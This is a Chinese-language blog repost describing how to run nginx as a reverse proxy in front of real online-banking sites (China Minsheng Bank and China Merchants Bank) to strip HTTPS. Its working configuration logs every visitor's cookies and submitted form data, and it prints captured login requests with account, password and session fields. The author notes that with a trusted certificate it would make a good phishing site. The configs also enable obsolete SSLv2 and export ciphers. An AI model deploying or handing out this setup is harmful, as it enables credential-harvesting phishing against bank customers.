使用nginx截取https数据

https虽然是加密的，本地还是有办法分析的，如进程注入等等方法，google看，太高阶。网上看到个简单的方法记一下

附：wireshark抓本机包http://wiki.wireshark.org/CaptureSetup/Loopback Other Alternatives: 改路由最简单

原帖：http://blog.chinaunix.net/space.php?uid=11170468&do=blog&id=2903067

 做渗透测试时,会碰到https加密的网页面,无法直接使用各种工具.可以使用web服务器软件对页面进行转发,从而实现脱密.这边使用nginx进行测试.

 

    建立一个nginx服务器,修改配置文件/etc/nginx/sites-available/default.以民生银行的个人网银行为例进行配置.

# You may add here your # server { # ... # } # statements for each of your virtual hosts server {         listen 80;         server_name localhost;         access_log /var/log/nginx/localhost.access.log;         location / {                 index index.htm index.html;                 proxy_pass https://ebank.cmbc.com.cn/;          } }

通过配置proxy_pass https://ebank.cmbc.com.cn/;使nginx成为一个代理服务器.重启服务后,对nginx服务器进行访问.http://192.168.52.129/index_NonPrivate.html:

 

通过WSockExpert截取提交数据

 

POST /weblogic/servlets/EService/CSM/NonPrivateLogin?channelID=&PriErrPage=PriErrPage.html HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword,application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument,application/xaml+xml, */* Referer: http://192.168.52.129/weblogic/nonsecindex.jsp?channelID= Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Host: 192.168.52.129 Content-Length: 78 Connection: Keep-Alive Cache-Control: no-cache Cookie: JSESSIONID=KMhkvGWG51B1f3y37MXvpkqSWvc8vcShLcjnchyLQSzyQq32C5nh!1655737129!270743917; K-JSESSIONID-lgnlbcme=3334A3537EB07580F51C46CFC8ABF69C logintype=u&txcode=c99900&account=11111111111&loginPwd=222222&CheckCode=333333

如果需要记录通过ngnix代理提交的内容,修改default配置文件.

# HTTPS server # server {         listen 443;         server_name 192.168.52.129;          ssl on;         ssl_certificate ssl/cert.crt;         ssl_certificate_key ssl/cert.key;         ssl_session_timeout 5m;         ssl_protocols SSLv2 SSLv3 TLSv1;         ssl_ciphers ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP;         ssl_prefer_server_ciphers on;         location / { # root /etc/nginx/html; # index index.html index.htm;                 proxy_pass https://pbsz.ebank.cmbchina.com/;         }         log_format main '$remote_addr - [$time_local] $request ||||| $http_cookie ||||| $request_body';         access_log /var/log/nginx/access.log main; }

    在日志文件中记录了$http_cookie(cookie信息)和$request_body(http内容),并使用招行个人网银为例.如果在申请一个通过认证的证书,站点将成为一个不错的钓鱼网站.

以下是截取的一个日志信息.包括了url信息,cookie信息和http提交内容:

192.168.52.1 - [05/Oct/2009:14:27:24 +0800] POST /CmbBank_GenShell/UI/GenShellPC/Login/GenLogin.aspx HTTP/1.1 ||||| CMB_GenServer=Lo ginType:A&BranchNo:0010&CreditCardType:A&IdType:01 ||||| ClientNo=015C3BBB172525FEBE9231E3448941E1515070230094203100051384&ExtraPwd= 3333&BranchNo=0010&AccountNo=ipJSoiVbS3HNMcI-3vYQsHiFp0WLlDsX9-eWKN97PbekdnzNzVg288TJCW6VdxDpufQfejoTCe-uSmgWZL67AQ__&Password=ikS2P -JmservIWpMgda8hHEzLJA04Aa6viJx0QF2zrWUDlxiLpLTbqhbVNbfqgA0c7ipLQ0zLi3fEjZJAPRdMA__&HardStamp=Aj8wMTVDM0JCQjE3MjUyNUZFQkU5MjMxRTM0ND g5NDFFMTUxNTA3MDIzMDA5NDIwMzEwMDA1MTM4NElGYmltRWVOyyIm2848AfJ9ZSdePA9n6S4j8Yf212z5y2pbjApY1HinUJmJCwGL48QLiWo8*Fmm75fzVtjTH9*fjI2qx* CEXUKkf93ltwsSq5*UvM7zkGgCaCHXQPLF396CtYjkyC82CMVIHcB89kIq*iEF7XMXCbqKloHsh5LHSCYim0wKa28GzWczV2zX9tcqGkGAPwPXuzwTF3lk7BxZstXnFx59KK jVerd8V5RNf-JAGe0aBSgt3CxxJQ__&Licex=AjgwMTVDM0JCQjE3MjUyNUZFQkU5MjMxRTM0NDg5NDFFMTUxNTA3MDIzMDA5NDIwMzEwMDA1MTM4NAAAAAAAAACqPBt4PB7 VfxBrLCVptuY12saTrYLj9xrwnsmeVMxt5O4K9LASxMNND3gZ8QOr2eQavsKgpUfsscvzXohvN7E4tbJocTwnpx6SJRsNjXImZDYP*Tq0YjH6i2ZbZu0m7gtnL01ibfqjTxM a4vplPyCLgQ__&LoginType=A